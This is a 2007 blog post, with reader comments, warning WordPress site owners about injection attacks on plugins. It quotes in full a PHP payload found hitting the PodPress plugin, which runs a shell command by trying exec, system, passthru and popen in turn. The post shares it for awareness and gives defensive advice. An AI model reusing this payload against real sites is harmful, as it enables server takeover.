One of the ugliest thing that could happen to a blog or a website is getting hacked. For a person like me who runs his own dedicated server, this is a daily pain in the neck. We get hack attacks everyday, some by expert hackers but mostly script kiddies who take some scripts laying around somewhere and try to inject malicious codes into your site hoping to get access.
Since Friday, my blog has been targeted incessantly. You could be next! (Or you’ve already been, you just don’t know it yet.) So be wary.
One of the first signs of hacks attempts can be detected thru your error_logs. They’re usually found on the root folder of your site or the base directory of your blog. What they usually do is affix a script in your URL hoping to execute it. Here’s one script I found being injected to my PodPress plugin:
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Several people have encountered the same and have been successfully hacked. The script is uploaded somewhere else and being pulled up from the target site. Your error logs might display this as such:
[30-Jul-2007 08:17:57] PHP Warning: parse_url + the URL it’s testing for holes or vulnerabilities.
So, be careful. Always check your files for open permissions (+777) and fix them. Upgrade to the latest stable version of WordPress or any software you’re using. Check all your plugins if they need upgrades too. It’s usually the plugins (that we don’t bother to check) where we least expect them to attack.
Loading ...
Yes, a very important warning indeed. If I could just add emphasis on the “upgrade to the latest stable version” part, that’s how I got bitten. Actually, the provider of the software that had the vulnerability in it, discovered the problem and quickly provided a fix on the mailing list, of which I was a member. However, I put it on my “to do” list where I promptly forgot about it and never applied the fix, only to get hacked a month or so later.
So yes, keep your software and plug-ins up to date!
bob
What should be the permission code if not 777?
Does this mean a blog is LESS vulnerable if it has no plugins?
…and just curious, is this vulnerability issue via plugins also present when using other blogging platforms, like blogspot for instance?
@ Bob - lessons learned.
@ Dorene - I suggest 644, unless otherwise specified by the app.
@ journeyist - yup, less is more secure. If you’re on BlgoSpot, LiveJournal or other hosted sites, less worry for you since it’s the provider that takes care of it. Plugins pose more threat because they come from varying sources.
Yuga, I encountered error on your site last friday and I blogged about it..
Check this out. This might help.
http://skiper.pinoyanswers.com/yugatechs-blog-encountered-internal-server-error/
skiper, yup dude, read about it last Saturday. Wasn’t able to comment kase closed ata. but thanks for the info.
Annoying.. hack attacks. Good luck with it Abe.
Nakakatakot naman itong post na ito.
I’ve seen that attempted on sites with the Amember membership script. It’s as if someone is trying to get hold of usernames and passwords so that they can log into the members-only folder.
I think I was hacked before when the Ploghost server that hosted the .com.ph blogs went hay-wired just before the MOA Blogger meetup.
My blog’s DB was wiped clean! Good thing I had backups on standby, otherwise, I’d gone insane!